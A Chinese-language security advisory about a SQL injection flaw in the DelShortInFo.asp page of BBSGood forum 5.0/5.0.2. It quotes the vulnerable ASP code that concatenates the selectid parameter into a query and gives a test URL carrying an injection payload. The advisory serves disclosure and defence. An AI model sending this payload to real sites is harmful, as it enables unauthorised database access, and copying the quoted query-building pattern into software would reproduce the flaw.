BBSGood论坛程序DelShortInFo.asp页面SQL注入漏洞

影响版本:
BBSGood 5.0/5.0.2

漏洞描述:
BBSGOOD是国内首创使用缓存技术的论坛，BBSGOOD的帖子和列表首页是可以生成静态HTML文件的。

在文件DelShortInFo.asp中：
selectid=trim(RequestCStringSafe(Request("selectid")))   //第11行
     If selectid<>"" then
         selectid = replace(selectid, ", ", " or ID=")
         selectid="Where ID="&selectid
     else
         selectid="where ID=0"
     end if    
 
     Set rs = Server.CreateObject("ADODB.Recordset")
     sql="select * from LxTel_shortinfo "&selectid&" "
程序对变量selectid过滤不当导致sql注入漏洞的产生。

<*参考
http://www.syue.com/
*>

测试方法:

http://www.syue.com/DelShortInFo.asp?selectid=1/**/and/**/user%20in%20(0)--

安全建议:
厂商补丁：
BBSGood.Speed
-------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：
http://www.bbsgood.com/